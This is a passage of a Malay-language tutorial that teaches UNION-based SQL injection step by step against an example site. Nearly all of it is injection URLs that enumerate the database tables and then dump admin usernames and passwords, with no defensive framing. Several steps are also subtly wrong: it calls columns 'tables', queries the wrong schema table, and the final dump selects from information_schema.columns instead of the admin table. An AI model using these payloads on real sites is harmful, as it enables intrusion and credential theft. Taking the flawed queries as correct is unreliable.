jika anda perhatikan perbezaan laman sebelum dan selepas di inject , maka
ia berpotensi di inject.
- Jadi , sehingga kini Keychaine harap anda semua faham bagaimana untuk
mengenalpasti laman yang berpotensi di inject .
Mendapatkan Data
- Dibahagian ini , Keychaine akan menerangkan secara lalu bagaimana
mendapatkan Data melalui query ( suntikan / injection )
- Setelah kita mendapati sesuatu laman mempunyai vuln untuk sql injection ,
anda perlu mendapatkan maklumat jumlah table dan column dalam bagi
sesuatu database.
- Dengan menggunakan arahan ORDER BY akan memberikan maklumat
tersebut.
- Anda harus meneka jumlah table dengan perhatikan error yang muncul. Jika
belum keluar error maka jumlah table masih banyak.
- Contohnya :
http://www.contoh.my/index.php?id=1+ORDER+BY+1
http://www.contoh.my/index.php?id=1+ORDER+BY+2
http://www.contoh.my/index.php?id=1+ORDER+BY+3
http://www.contoh.my/index.php?id=1+ORDER+BY+4 <Ada error
- Jadi , jumlah table ialah 3
Keluarkan Data
- Setelah kita mengetahui jumlah table , maka kita perlu mengeluarkan data
melalui arahan UNION SELECT
- Contoh laman tadi mempunyai 3 table.
http://www.contoh.my/index.php?id=1+ORDER+BY+3
- Maka , tambahhkan arahan UNION SELECT. Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,2,3
http://www.contoh.my/index.php?
id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_sc
hema.tables
- Dan gantikan
+from+information_schema.tables+where+table_schema=database() kat
belakang. Contohnya :
http://www.contoh.my/index.php?
id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_sc
hema.tables+where+table_schema=database()
- Kali ini anda akan perhatikan folder table yang mengandungi data
didalamnya. Contohnya anda lihat table yang bernama Admin , sila
convert table name Admin tersebut kepada HEXADECIMEL disini
- Setelah anda convert , sila masukkan arahan group_concat(column_name)
kat no ajaib tadi ( 2 ). Contohnya :
http://www.contoh.my/index.php?
id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_s
chema.tables+where+table_schema=database()
- Dan kemudian tambahkan arahan
+from+information_schema.columns+where+table_name=0xHEXADECIMEL
. Contohnya table name tadi Admin , setelah di convert menjadi
41444D494E . Maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?
id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_s
chema.columns+where+table_name=0x41444D494E
- Sekarang kita berada dalam folder ADMIN , jadi kita akan keluarkan data
melalui arahan concat_ws(0x3a,nama column yang terkandung dlm table
ADMIN) . Contohnya table yang ada ialah username dan password ,
maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?
id=1+UNION+SELECT+1,concat_ws(0x3a,username,password),3+from+inf
ormation_schema.columns+where+table_name=0x41444D494E